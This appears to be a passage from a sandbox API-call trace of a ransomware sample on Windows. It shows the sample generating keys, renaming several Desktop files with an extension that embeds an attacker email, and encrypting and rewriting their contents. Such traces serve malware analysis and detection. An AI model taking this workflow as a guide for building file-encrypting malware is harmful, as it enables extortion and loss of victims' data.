	[0099.677] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.679] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x60eef8 | out: hHeap=0x540000) returned 1
	[0099.679] CloseHandle (hObject=0x384) returned 1
	[0099.680] GetProcessHeap () returned 0x540000
	[0099.680] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.680] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.680] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.680] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fec48 | out: hHeap=0x540000) returned 1
	[0099.680] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febd0 | out: hHeap=0x540000) returned 1
	[0099.680] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5febd0
	[0099.680] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.680] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.680] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.680] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.680] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv", dwFileAttributes=0x80) returned 1
	[0099.681] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv") returned 54
	[0099.681] GetProcessHeap () returned 0x540000
	[0099.681] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd2) returned 0x56b4c0
	[0099.681] lstrcpyW (in: lpString1=0x56b4c0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv"
	[0099.681] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.681] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttxl9yojb3t.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttxl9yojb3t.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.686] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ttxl9yoJB3t.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttxl9yojb3t.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.686] GetProcessHeap () returned 0x540000
	[0099.686] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b4c0 | out: hHeap=0x540000) returned 1
	[0099.686] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=37942) returned 1
	[0099.686] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9436
	[0099.686] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.686] GetProcessHeap () returned 0x540000
	[0099.686] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.686] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.686] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.688] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.688] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.688] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9436) returned 0x5ffbb8
	[0099.688] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9436) returned 0x608ff8
	[0099.688] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.688] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x9436, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x9436, lpOverlapped=0x0) returned 1
	[0099.689] SetFilePointer (in: hFile=0x384, lDistanceToMove=-37942, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.689] WriteFile (in: hFile=0x384, lpBuffer=0x608ff8*, nNumberOfBytesToWrite=0x9436, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x608ff8*, lpNumberOfBytesWritten=0x3a1f778*=0x9436, lpOverlapped=0x0) returned 1
	[0099.689] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.689] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x608ff8 | out: hHeap=0x540000) returned 1
	[0099.689] CloseHandle (hObject=0x384) returned 1
	[0099.690] GetProcessHeap () returned 0x540000
	[0099.690] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.690] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.690] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.690] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febd0 | out: hHeap=0x540000) returned 1
	[0099.690] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.690] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9500
	[0099.690] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.690] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.690] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.690] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.690] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots", dwFileAttributes=0x80) returned 1
	[0099.691] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots") returned 47
	[0099.691] GetProcessHeap () returned 0x540000
	[0099.691] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc4) returned 0x56b448
	[0099.691] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots"
	[0099.691] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.691] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p1el.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p1el.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.694] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P1eL.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p1el.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.694] GetProcessHeap () returned 0x540000
	[0099.694] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.694] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=47230) returned 1
	[0099.694] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb87e
	[0099.694] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.694] GetProcessHeap () returned 0x540000
	[0099.694] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.694] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.694] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.695] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.695] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.695] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb87e) returned 0x5ffbb8
	[0099.695] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb87e) returned 0x60b440
	[0099.695] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.695] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0xb87e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0xb87e, lpOverlapped=0x0) returned 1
	[0099.696] SetFilePointer (in: hFile=0x384, lDistanceToMove=-47230, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.696] WriteFile (in: hFile=0x384, lpBuffer=0x60b440*, nNumberOfBytesToWrite=0xb87e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60b440*, lpNumberOfBytesWritten=0x3a1f778*=0xb87e, lpOverlapped=0x0) returned 1
	[0099.696] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.696] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x60b440 | out: hHeap=0x540000) returned 1
	[0099.696] CloseHandle (hObject=0x384) returned 1
	[0099.697] GetProcessHeap () returned 0x540000
	[0099.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9500 | out: hHeap=0x540000) returned 1
	[0099.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9498 | out: hHeap=0x540000) returned 1
	[0099.697] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0099.697] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.697] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.697] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.697] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.697] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3", dwFileAttributes=0x80) returned 1
	[0099.698] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3") returned 56
	[0099.698] GetProcessHeap () returned 0x540000
	[0099.698] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x56b448
	[0099.698] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3"
	[0099.698] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.698] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ox3frqortn-lm.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ox3frqortn-lm.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.701] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ox3FRqoRTn-lM.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ox3frqortn-lm.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.701] GetProcessHeap () returned 0x540000
	[0099.701] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.701] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=87482) returned 1
	[0099.701] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x155ba
	[0099.701] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.701] GetProcessHeap () returned 0x540000
	[0099.701] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.701] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.701] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.702] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.702] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x155ba) returned 0x5ffbb8
	[0099.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x155ba) returned 0x3790048
	[0099.703] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.703] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x155ba, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x155ba, lpOverlapped=0x0) returned 1
	[0099.705] SetFilePointer (in: hFile=0x384, lDistanceToMove=-87482, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.705] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x155ba, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x155ba, lpOverlapped=0x0) returned 1
	[0099.705] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.705] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0099.705] CloseHandle (hObject=0x384) returned 1
	[0099.706] GetProcessHeap () returned 0x540000
	[0099.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0099.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588f80 | out: hHeap=0x540000) returned 1
	[0099.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0099.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.706] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.706] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.706] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg", dwFileAttributes=0x80) returned 1
	[0099.706] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg") returned 61
	[0099.707] GetProcessHeap () returned 0x540000
	[0099.707] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x56b448
	[0099.707] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg"
	[0099.707] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.707] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0j_zhuh4lgnskmmbm.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0j_zhuh4lgnskmmbm.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.709] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o0j_ZHuh4LGnsKMmBM.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0j_zhuh4lgnskmmbm.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.709] GetProcessHeap () returned 0x540000
	[0099.709] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.709] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=87998) returned 1
	[0099.709] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x157be
	[0099.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.709] GetProcessHeap () returned 0x540000
	[0099.709] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.710] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.710] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.710] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.711] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x157be) returned 0x5ffbb8
	[0099.711] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x157be) returned 0x3790048
	[0099.711] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.711] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x157be, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x157be, lpOverlapped=0x0) returned 1
